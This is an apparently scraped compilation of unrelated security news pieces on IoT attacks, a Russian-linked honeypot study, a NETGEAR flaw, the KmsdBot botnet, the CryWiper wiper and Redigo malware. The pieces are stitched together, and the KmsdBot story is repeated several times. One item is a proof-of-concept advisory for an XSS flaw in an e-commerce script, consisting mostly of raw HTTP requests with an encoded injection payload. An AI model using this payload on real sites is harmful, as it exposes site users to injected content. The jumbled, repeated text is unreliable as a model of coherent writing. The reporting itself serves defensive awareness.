A world of increasingly connected devices has created a vast attack surface for sophisticated adversaries.

The explosion in connected devices, ranging from the Internet of Things to networking devices and operational technology (collectively known as the Extended Internet of Things, or xIoT), has created a vast, diverse, and largely unmapped attack surface that sophisticated adversaries are actively exploiting.

This growing risk is reflected in many recent reports from companies like Microsoft, Intel 471, and Zscaler that have found a significant uptick in both targeted and untargeted attacks on these devices, with a high rate of malware infections.

However, these threats — particularly when they target IoT devices — are often misunderstood or dismissed, as companies tend to view them as less significant than a traditional network attack. Part of the reason for this is the mistaken belief that IoT threats are mostly limited to botnet malware used for cryptomining and distributed denial-of-service (DDoS) attacks. In reality, IoT attacks are becoming much more sophisticated and now pose serious threats to corporate network integrity, data security, and even physical security systems.

Here are three xIoT attacks every company should be aware of:

**Pivoting From the xIoT Device**

Since many xIoT devices lack even basic native cybersecurity protections, disallow the installation of traditional endpoint security software, and are often unmonitored, they are an effective initial access point for attackers looking to gain a beachhead on a company and then move laterally across its network.

Once the xIoT device has been compromised, the adversary can use this foothold to upload tools, sniff network traffic, search for other exploitable devices, and exfiltrate sensitive data. For example, an attacker can transition from an IoT device into the main IT network, as well as the operational technology (OT) network.

This type of "pivot attack" has already been observed in the wild by multiple companies. My company has seen a growing number of corporate cyberattacks, in which the company was first compromised through a security camera, door controller, or other device, then targeted with ransomware, espionage, or data theft through its IT network.

In 2019, Microsoft Threat Intelligence Center detected an adversary that exploited three different IoT devices (a VoIP phone, a printer, and a video decoder), from which the actor established a presence on the network while looking for further access. Researchers also unveiled a proof-of-concept ransomware that can spread from an xIoT device to an IT network.

**Atypical Data Theft**

xIoT devices can also be direct targets of espionage and data theft.

Certain office devices like connected printers and document scanners are storehouses of sensitive corporate information that is largely unprotected. In the healthcare industry, CT scanners and MRI machines also contain valuable personal and medical information. Industrial devices can pose data breach risks too. Certain OT devices, like programmable logic controllers (PLCs), can contain privileged manufacturing and processing details, such as temperature and pressure ranges, chemical mixing.

This type of sensitive data storage in xIoT devices is often overlooked by traditional information security audits, and the devices themselves offer little, if any, data protection. For remote attackers, gaining access to these devices is usually a trivial matter.

My company has found that 50% of xIoT devices use default passwords, 68% of devices have high-risk or critical CVEs in their firmware, and 26% of these devices are end-of-life and no longer supported. This means in literally half of these cases, all an attacker needs to do is enter in a default password to gain access to privileged data.

**xIoT as a Persistence Strategy**

Threat actors who have already breached a corporate IT network through traditional means like phishing may also carry out a second-stage attack on xIoT devices to achieve long-term persistence inside the organization.

One example is the threat actor UNC3524, which Mandiant recently discovered had been installing a backdoor called QuietExit in opaque network appliances and IoT devices like security cameras, remaining undetected on victims' networks for at least 18 months.

xIoT devices are an ideal hiding place for sophisticated adversaries. These devices are poorly monitored, lack anti-malware and intrusion detection coverage, and are not easy to analyze during incident response. My company has found that over 80% of security teams can't even identify the majority of xIoT devices they have in their networks. They also fall into an administrative gray area in terms of who is responsible for managing them (is it the IT team, the security team, the operations team, or the vendor?), which leads to confusion and inaction.

An adversary can easily install a backdoor in any one of these overlooked xIoT devices that will be exceedingly difficult for the security team to detect. The average enterprise has anywhere from tens of thousands to millions of xIoT devices, and typically relies on manual processes for monitoring and maintaining them. Detecting such a backdoor will be like trying to find a needle in an enormous haystack (or haystacks).

**Preventing the Full Range of xIoT Attacks**

In spite of their many risks, xIoT devices can be sufficiently protected without imposing high costs on a company.

Basic measures such as strong password management and keeping firmware up to date will drastically reduce the risk. Accurate inventorying and regular monitoring are also key.

Where companies will be challenged is in terms of the volume of devices they must protect. This is why automation is important, as manually changing passwords and updating firmware on such a vast array of devices isn't feasible for most companies.

3 xIoT Attacks Companies Aren't Prepared For

Victims include at least 15 healthcare organizations, one Fortune 500 company, and other organizations in multiple countries, security vendor says.

Russia-affiliated threat actors have compromised systems belonging to multiple organizations in the US, the UK, France, and other countries and are using them to launch attacks against targets in Ukraine.

Among those whose networks the threat actors have hijacked are at least 15 healthcare organizations, one Fortune 500 company, and one dam-monitoring system, according to a study by threat intelligence and cyber-deception company Lupovis published Dec. 6.

"Russian criminals are rerouting through their networks to launch cyberattacks on Ukrainian \[organizations\], which effectively means they are using these organizations to carry out their dirty work," Lupovis warned in its report.

Lupovis recently deployed a set of decoy documents, Web portals, and SSH services on the Internet as part of an effort to study Russian threat activity targeting Ukrainian entities. The goal was to find out the extent to which Russia's war in Ukraine had spilled over into the cyber realm, like many predicted it would.

**Ukraine-Themed Decoys**

The company designed the decoys in a manner as to entice Russian actors looking to compromise Ukrainian targets. For instance, Lupovis labeled decoy documents with names related to Ukrainian government officials and the country's Critical National Infrastructure, and its decoy websites spoofed Ukrainian government and political sites. The decoy documents contained information that adversaries would consider useful, such as usernames, passwords, and addresses to purportedly critical assets and databases on the decoy websites. The company deliberately leaked some of these fake documents in key Dark Web forums.

Lupovis managed to attract three types of adversaries to its decoy sites. One set comprised of opportunistic attackers, or those constantly scanning the Internet for exploitable CVEs and systems. This was a category of threat actor that Lupovis ignored for the purposes of its study. The second category of adversary was comprised of threat actors who landed directly on the decoy sites without following the breadcrumbs that Lupovis had planted on the Dark Web forums. The third set of threat actors were mostly Russia-based adversaries who took the bait, extracted information from the decoy documents, and used it to attack the decoy websites.

In all, between 50 and 60 attackers landed on each of the two decoy sites Lupovis has set up — some of them just minutes after the sites went live. Once on the sites, the attackers carried out a variety of malicious activities, including SQL injection attacks, remote file inclusion tactics, and Docker exploitation attempts. In many cases, threat actors on the decoy sites attempted to make them part of bigger DDoS botnets or to use them to launch attacks against other Ukrainian websites.

The largest group of attackers were independent actors, says Xavier Bellekens, CEO of Lupovis. They often appeared to be acting alone and were part of communities on Telegram, he says. "Some actors were more advanced in their techniques, tactics, and procedures. However, we haven’t yet been able to correlate them against known Russian APTs." 

The primary motivations in many of these attacks appeared to be information stealing, disruption, and using the decoy websites to launch attacks against other Ukrainian targets, he notes.

**Going After Healthcare**

One of the most disconcerting aspects that researchers at Lupovis observed was the number of attacks on its decoys from other, previously compromised websites and systems belonging to healthcare organizations and entities in other industry sectors, from multiple countries. 

Bellekens says Lupovis was unable to identify the specific groups that were carrying out these attacks, or if any of them were previously known Russian advanced persistent threat groups. "We identified them as Russian if they used scripts containing Cyrillic, tried to access Russian websites, \[or\] looked for specific information in Cyrillic," he says. "A large number of these adversaries tried to exploit the decoys further to launch attacks against Ukrainian entities."

Lupovis' findings suggests that fears earlier this year about Russian cyberattacks in Ukraine impacting organizations in other countries were correct. "Russian cyberattacks have skyrocketed and any country or business that has allied with Ukraine, or opposed the war, has become a target," according to the report.

Concerns over such attacks prompted the US Cybersecurity and Infrastructure Security Agency (CISA) to issue an advisory earlier this year urging both government and private organizations to assume a Shields Up posture for detecting and responding to attacks from Russian cyber groups. The advisory followed remarks by President Joe Biden regarding the US government's willingness to respond in kind to any attempt by Russia to attack the US in cyberspace or through other asymmetric means.

Russian Actors Use Compromised Healthcare Networks Against Ukrainian Orgs

By Deeba Ahmed
According to Tenable research, NETGEAR had to release last-minute patches for their devices that were a part of the Pwn2Own event. 
This is a post from HackRead.com Read the original post: NETGEAR Router Vulnerability Allowed Access to Restricted Services

A new report from Tenable, a Columbia, Maryland-based cybersecurity firm, outlined an emerging threat related to NETGEAR and TP-Link routers.

According to Tenable research, both TP-Link and NETGEAR had to release last-minute patches for their devices that were a part of the **Pwn2Own event**. For your information, Pwn2Own is a computer hacking competition held yearly at the CanSecWest security conference since 2007.

Last Minute Patch Issued by TP-Link

According to researchers, the NETGEAR Nighthawk WiFi6 Router (RAX30 AX2400 series) was to be included in the **bug-finding contest at Pwn2Own**. Just one day before the deadline for registering for the contest, the company identified a flaw that invalidated their submission and had to issue a patch urgently.

**What was the Issue?**

According to a **blog post** published by cybersecurity experts at Tenable, network misconfiguration was identified in NETGEAR Nighthawk router versions released before 1.0.9.90. These devices, by default, feature IPv6 for the WAN interface.

The problem is that firewall restrictions in place to determine IPv4 traffic’s access restrictions don’t work on the IPv6 WAN interface. That’s why anyone gaining random access to a service running on the device can listen to IPv6 inadvertently.

For instance, by default, Telnet servers and SSH spawned on Ports 22 and 2. An adversary can exploit this misconfiguration to interact with services accessible only by local network clients.

**Threat Mitigation Response**

Tenable discovered the patch for a flaw pending disclosure on 1st December 2022, and the next day it reached out to the vendor for its CVE identifier.

Those using the affected NETGEAR Nighthawk routers should apply the recently released patch, which can be found **here**.

It must be noted that the auto-update and Check for Updates features of the affected router don’t detect this patch at the moment, so you have to apply it manually.

1.  **415,000 routers infected by cryptomining malware**
2.  **How To Keep Your Router And WiFi Safe From Hackers**
3.  **D-Link home routers plagued with critical vulnerabilities**
4.  **Security flaws turn Netgear Routers into army of botnets**
5.  **Netgear Gaming Router Offers Protection Against DDoS Attacks**

NETGEAR Router Vulnerability Allowed Access to Restricted Services

A cross-site scripting (XSS) vulnerability in the component /signup_script.php of Ecommerce-Website v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the eMail parameter.

**Description:**

The value of the eMail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The attacker can trick the users of this system, very easy to visit a very dangerous link from anywhere, and then the game will over for these customers. Also, the attacker can create a network from botnet computers by using this vulnerability.

**STATUS: HIGH Vulnerability - CRITICAL**

\[+\] Exploit00:

    POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://pornhub.com HTTP/1.1
    Host: pwnedhost.com
    Accept-Encoding: gzip, deflate
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f
    Origin: http://pwnedhost.com
    Upgrade-Insecure-Requests: 1
    Referer: http://pwnedhost.com/ecommerce/index.php
    Content-Type: application/x-www-form-urlencoded
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 0
    

**Description01:**

JavaScript can be injected into the application response (a vulnerable app - signup\_script.php, no sanitizing submit function). The attacker can crash the MySQL server by sending large bites of POST requests to the MySQL server of this system.

**Real attack: JavaScript attack - type: DDOS SQL injection**

\[+\] Exploit01:

    POST /ecommerce/signup_script.php HTTP/1.1
    Host: pwnedhost.com
    Accept-Encoding: gzip, deflate
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f
    Origin: http://pwnedhost.com
    Upgrade-Insecure-Requests: 1
    Referer: http://pwnedhost.com/ecommerce/index.php
    Content-Type: application/x-www-form-urlencoded
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 1070
    
    eMail=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%63%64%6e%35%2d%63%61%70%72%69%6f%66%69%6c%65%73%2e%6e%65%74%64%6e%61%2d%73%73%6c%2e%63%6f%6d%2f%77%70%2d%63%6f%6e%74%65%6e%74%2f%75%70%6c%6f%61%64%73%2f%32%30%31%37%2f%30%37%2f%49%4d%47%5f%30%30%36%38%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&password=s9L%21c7x%21E2&firstName=WoZykRqh&lastName=cqeMPJcJ
    

**Reproduce:**

href

**Proof and Exploit:**

href

**Real Exploit:**

href

**Real Exploit - code insert:**

href

**Time spent**

1:45

CVE-2022-45990: CVE-nu11secur1ty/vendors/winston-dsouza/ecommerce-website at main · nu11secur1ty/CVE-nu11secur1ty

A single improperly formatted command has effectively killed KmsdBot botnet, security vendor says.

It's not often that malware authors go through the effort of creating a malicious tool for assembling a botnet, only to then find a way to effectively sabotage it themselves.

But that appears to be precisely the case with "KmsdBot," a distributed denial-of-service (DDoS) and cryptomining botnet that researchers from Akamai found infecting systems across multiple industries last month. Now, it has since gone largely silent because of a single improperly formatted command on the part of its author.

**A Versatile Threat**

The malware, written in the Go programming language, infects systems via an SSH connection with weak credentials and uses UDP, TCP, and HTTP POST and GET commands in DDoS attacks. Kaspersky found the malware is designed to target multiple architectures such as Windows, Arm64, and mips64 systems. Among those the malware has affected are luxury car makers, gaming companies, and IT firms.

In all the attacks that Akamai observed, the threat actors used KmsdBot to execute DDoS attacks, though the malware also contains cryptomining functionality.

Following Akamai's initial disclosure in November, researchers from the company continued to monitor and analyze the threat. As part of the exercise, they modified a recent sample of KmsdBot and decided to test various scenarios related to the malware's command and control (C2) functionality.

The Akamai researchers found the spot in the malware's code that contained the IP address and port for KmsdBot's C2 server and modified it, so the address pointed to Akamai's IP space. The goal was to have a controlled environment from where the researchers could send their own commands to the bot sample to see how it worked.

**A Fatal Oopsie**

During the testing, the Akamai researchers discovered the bot suddenly stopped working after receiving a command to send a bunch of junk data to bitcoin.com, in an apparent bid to DDoS the website.

A closer look showed the command to be malformed. "The guys running the botnet crashed it by accident," Larry Cashdollar, principal security intelligence response engineer at Akamai, tells Dark Reading. "They sent in a command that was missing a space between the target URL and port number."

The bot does not contain any error-checking functionality to verify if the commands it receives are properly formatted, Cashdollar says. As a result, the Go binary crashes with an "index out of range" error message.

He also says that Akamai was able to replicate the issue by sending the bot it had modified an improperly formatted command of its own. 

"This malformed command likely crashed all the botnet code that was running on infected machines and talking to the C2 — essentially, killing the botnet," Akamai noted in its update on the malware this week.

Importantly, the bot does not support any persistence mechanism. So, the only way for the malware authors to rebuild the KmsdBot botnet is to reinfect systems from scratch.

Cashdollar says almost all of the KmsdBot-related activity that Akamai was tracking over the past several weeks has ceased. But there are signs that the threat actors have begun attempting to infect systems again, he notes.

Malware Authors Inadvertently Take Down Own Botnet

By Deeba Ahmed
CryWiper showcases ransomware-like features, such as file modification, adding a .CRY extension to the files, leaving a ransom note, etc.
This is a post from HackRead.com Read the original post: CryWiper Masquerading as Ransomware to Target Russian Courts

Threat actors are targeting Russian Mayors’ courts and offices with a new malware called CryWiper that appears as ransomware. In reality, it’s a wiper that can destroy all the data on an infected system permanently.

This reminds us of **Microsoft’s report in January 2022** in which a “destructive malware” was faking ransomware infection to target Ukrainian tech organizations, government agencies, and non-profit organizations.

**Campaign Analysis**

Cybersecurity firm Kaspersky and the Izvestia news service’s researchers have revealed startling details of how a new wave of attack has surfaced involving a brand-new trojan. It showcases ransomware-like features such as file modification, adding .CRY extension to the files and saving a README.txt file and a ransom note.

The note contains a bitcoin wallet address, the infection ID, and the email ID of the malware creators. However, these are deceptive measures employed by the attackers because CryWiper isn’t ransomware but a wiper, which is why researchers dubbed it CryWiper.

CryWiper ransom note (Image: Kaspersky)

The files, according to researchers, it modifies cannot be restored to their previous/original state. So, it is pointless even to **consider paying the ransom**.

**Pinpoint Targets**

In their **report**, Kaspersky researchers noted that CryWiper launches ‘pinpoint attacks’ on targets based in Russian Federation, whereas Izvestia noted that the targets are mayors’ courts and offices in Russia.

Reportedly, this wiper corrupts any data that isn’t essential for the operating systems’ functioning. Such as it doesn’t modify files with extensions .dll, .exe, .msi, or .sys. Kaspersky discovered the attacks in the past few months.

Moreover, it avoids affecting various system folders stored in the C:\\Windows directory. That’s because its main targets are user documents, archives, and databases.

**Why CryWiper Leaves a Ransom Note?**

Izvestia identified that after infecting a system successfully, CryWiper left a note demanding 0.5 bitcoin and a wallet address to transfer funds. Kaspersky researchers explained that although it extorts money from its targets for data decryption, it doesn’t encrypt data but destroys its completely. They further observed that this wasn’t a mistake but the developer’s original intention.

**How does it Work?**

CryWiper resembles **IsaacWiper**, using the same algorithms to generate pseudo-random numbers for directly corrupting targeted files and overwriting data. In this instance, the wiper directly rewrites the file contents replacing the original with garbage.

Then, It creates a task in the Task Scheduler to restart the wiper every 5 minutes. CryWiper can also send the targeted device’s name to a C2 server and wait for a command from the server to start the attack.

Furthermore, CryWiper halts processes of **MS SQL databases** and **MySQL servers**, MS Active Directory web services, and **MS Exchange mail servers**. It deletes shadow copies of documents on the C: drive only to prevent their restoration. It also disables the infected system’s connection through RDP remote access protocol, probably to complicate the job of incident response teams.

**Protection from ransomware and Wipers**

To protect yourself or your business from ransomware and data wipers, the first step in protecting yourself from data wipers is to back up your files regularly. This will allow you to restore any lost or damaged data if it does become compromised.

Kaspersky recommends carefully controlling remote access connections to your infrastructure including public networks. You should also use **antivirus software** with active malware protection, which will help detect and remove any malicious programs before they can cause damage.

Additionally, you should set up strong passwords for all accounts associated with sensitive data and check for suspicious activity on them regularly.

1.  **Police lose evidence to ransomware attack; suspects walk free**
2.  **DDoS Attack and Data Wiper Malware hit Computers in Ukraine**
3.  **Iranian hackers hit Israel with disk wiper in disguise as ransomware**
4.  **Crippling attack on Iranian trains linked to Meteor file wiper malware**
5.  **Linux and Windows hit with disk wiper, ransomware, crypto-malware**

CryWiper Masquerading as Ransomware to Target Russian Courts

Almost a third of respondents in Fastly's Fight Fire with Fire survey view data breaches and data loss as the biggest cybersecurity threat.

Even with the shifting threat landscape, organizations view malware, phishing, and data breaches as their biggest threats.

Almost a third of respondents in Fastly's Fight Fire with Fire survey consider data breaches and data loss as the biggest cybersecurity threat to their organization over the next 12 months. Malware (29%) and phishing (26%) round out the top three. What's notable is the change in focus from 2021, when 31% of respondents named malware as their biggest threat, followed by distributed denial of service attacks (26%) and attacks targeting known vulnerabilities (25%).

While attacks exploiting vulnerabilities or misconfigured services were perceived as the biggest threats in 2021, malware, phishing, and ransomware appeared to be bigger issues in 2022. Fastly noted the fact that the 2022 Threat Landscape report from ENISA also identified ransomware as the top threat businesses were concerned about, while malware was the second most commonly identified threat.

Fastly's data showed that just 14% were concerned about DDoS attacks in 2022 — which is a surprisingly steep decline, especially considering the stratospheric increase in DDoS attacks in 2022. There were 60% more DDoS attacks in the first six months of 2022 than in the entirety of 2021, according to the report. One reason for the disconnect may be because content delivery networks (CDNs) are able to absorb the vast majority of DDoS attacks, freeing up IT to focus on other areas, Sean Leach, Fastly's chief product architect, said in the report.

While attacks against remote workers did not show up on the list of threats organizations are worried about, Fastly's data suggests that organizations are still very concerned about their ability to protect remote workers. Nearly half, or 46%, predicted that attacks on remote workers will drive cybersecurity threats over the next 12 months.

"Remote workers create no additional vulnerability on their own," Leach said, noting that concerns about securing remote workers have more to do with adoption of new technologies and learning how to use security controls effectively.

To bolster their defenses, 51% of global businesses are actively investing in remote employee security, with a further 38% planning on investing in it within the next two years, Fastly said in its report.

Overall, IT leaders are increasing their cybersecurity investments to bring in more tools and technologies to defend against threats — 73% said they were increasing cybersecurity investment. Unfortunately, more tools don't necessarily mean better security, as some of these tools may not easily integrate with the existing security stack or with each other, Leach said.

"Instead of buying any number of unnecessary tools, businesses with successful security strategies often work with fewer technologies which work closely together and are deeply integrated with one another," Leach said.

Concern Over DDoS Attacks Falls Despite Rise in Incidents

A previously undocumented Go-based malware is targeting Redis servers with the goal of taking control of the infected systems and likely building a botnet network.
The attacks involve taking advantage of a critical security vulnerability in the open source, in-memory, key-value store that was disclosed earlier this year to deploy Redigo, according to cloud security firm Aqua.

Database Security / Cyber Threat

A previously undocumented Go-based malware is targeting Redis servers with the goal of taking control of the infected systems and likely building a botnet network.

The attacks involve taking advantage of a critical security vulnerability in the open source, in-memory, key-value store that was disclosed earlier this year to deploy **Redigo**, according to cloud security firm Aqua.

Tracked as CVE-2022-0543 (CVSS score: 10.0), the weakness pertains to a case of sandbox escape in the Lua scripting engine that could be leveraged to attain remote code execution.

This is not the first time the flaw has come under active exploitation, what with Juniper Threat Labs uncovering attacks perpetrated by the Muhstik botnet in March 2022 to execute arbitrary commands.

The Redigo infection chain is similar in that the adversaries scan for exposed Redis servers on port 6379 to establish initial access, following it up by downloading a shared library "exp\_lin.so" from a remote server.

This library file comes with an exploit for CVE-2022-0543 to execute a command in order to retrieve Redigo from the same server, in addition to taking steps to mask its activity by simulating legitimate Redis cluster communication over port 6379.

"The dropped malware mimics the Redis server communication which allowed the adversaries to hide communications between the targeted host and the C2 server," Aqua researcher Nitzan Yaakov explained.

It's not known what the end goal of the attacks are, but it's suspected that the compromised hosts could be co-opted into a botnet to facilitate DDoS attacks or used to steal sensitive information from the database server to further extend their reach.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Exploiting Redis Vulnerability to Deploy New Redigo Malware on Servers

By Deeba Ahmed
The KmsdBot was known for targeting both Linux and Windows devices.
This is a post from HackRead.com Read the original post: A Syntax Error Led to Crashing of KmsdBot Cryptomining Botnet

KmsdBot was a newly discovered cryptocurrency mining botnet killed accidentally by Akamai’s team of researchers while researching on KmsdBot. According to researchers, a syntax error caused it to stop sending commands, which destroyed the botnet.

**What is KmsdBot?**

Named by Akamai Security Intelligence Response Team (SIRT) in November 2022, KmsdBot is was a **crypto mining botnet** equipped with command-and-control abilities. It infected victims by exploiting weak credentials and SSH via brute force.

The Akamai team assessed and **reported** on the botnet after one of its honeypots got infected. The botnet targeted both **Linux and Windows devices** using a range of microarchitectures to deploy mining software and include the compromised hosts in its DDoS bot army. Its main targets included gaming and tech firms and luxury vehicle makers.

1.  **Dangerous WireX Android DDoS Botnet Killed by Security Giants**
2.  **Andromeda Botnet that infected millions of devices is dismantled**
3.  **Mirai botnet resurfaces with MooBot variant against D-Link devices**
4.  **Russian Rsocks Botnet Powered by Millions of IoT Devices dismantled**
5.  **FBI Disrupts Cyclops Blink Botnet Used by Russian Intelligence agency**

**Incident Details**

In a **blog post**, Larry W. Cashdollar, a researcher at Akamai, the commands sent to the botnet while assessing its operational mechanism within a controlled environment mistakenly led to the malware’s neutralization.

After a single “improperly formatted command,” Cashdollar explains, the bot stopped sending any command. This could be possible because of the absence of an internal error-checking feature built into its source code to verify the incoming commands. 

So, any instruction given without a space between the port and the target website caused the Go binary on the infected device to crash entirely and stop communicating with its C2 server. Hence, this **killed the botnet**.

Since the botnet doesn’t feature a persistence mechanism, the malware operators will need to re-infect the devices once again and rebuild the entire infrastructure from scratch.

“This botnet has been going after some very large luxury brands and gaming companies, and yet, with one failed command it cannot continue. This is a strong example of the fickle nature of technology and how even the exploiter can be exploited by it,” Cashdollar explained.

A Syntax Error Led to Crashing of KmsdBot Cryptomining Botnet

An ongoing analysis into an up-and-coming cryptocurrency mining botnet known as KmsdBot has led to it being accidentally taken down.
KmsdBot, as christened by the Akamai Security Intelligence Response Team (SIRT), came to light mid-November 2022 for its ability to brute-force systems with weak SSH credentials.
The botnet strikes both Windows and Linux devices spanning a wide range of

An ongoing analysis into an up-and-coming cryptocurrency mining botnet known as **KmsdBot** has led to it being accidentally taken down.

KmsdBot, as christened by the Akamai Security Intelligence Response Team (SIRT), came to light mid-November 2022 for its ability to brute-force systems with weak SSH credentials.

The botnet strikes both Windows and Linux devices spanning a wide range of microarchitectures with the primary goal of deploying mining software and corralling the compromised hosts into a DDoS bot.

Some of the major targets included gaming firms, technology companies, and luxury car manufacturers.

Akamai researcher Larry W. Cashdollar, in a new update, explained how commands sent to the bot to understand its functionality in a controlled environment inadvertently neutralized the malware.

"Interestingly, after one single improperly formatted command, the bot stopped sending commands," Cashdollar said. "It's not every day you come across a botnet that the threat actors themselves crash their own handiwork."

This, in turn, was made possible due to the lack of an error-checking mechanism built into the source code to validate the received commands.

Specifically, an instruction issued without a space between the target website and the port caused the entire Go binary running on the infected machine to crash and stop interacting with its command-and-control server, effectively killing the botnet.

The fact that KmsdBot doesn't have a persistence mechanism also means that the malware operator will have to re-infect the machines again and re-build the infrastructure from scratch.

"This botnet has been going after some very large luxury brands and gaming companies, and yet, with one failed command it cannot continue," Cashdollar concluded. "This is a strong example of the fickle nature of technology and how even the exploiter can be exploited by it."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#ddos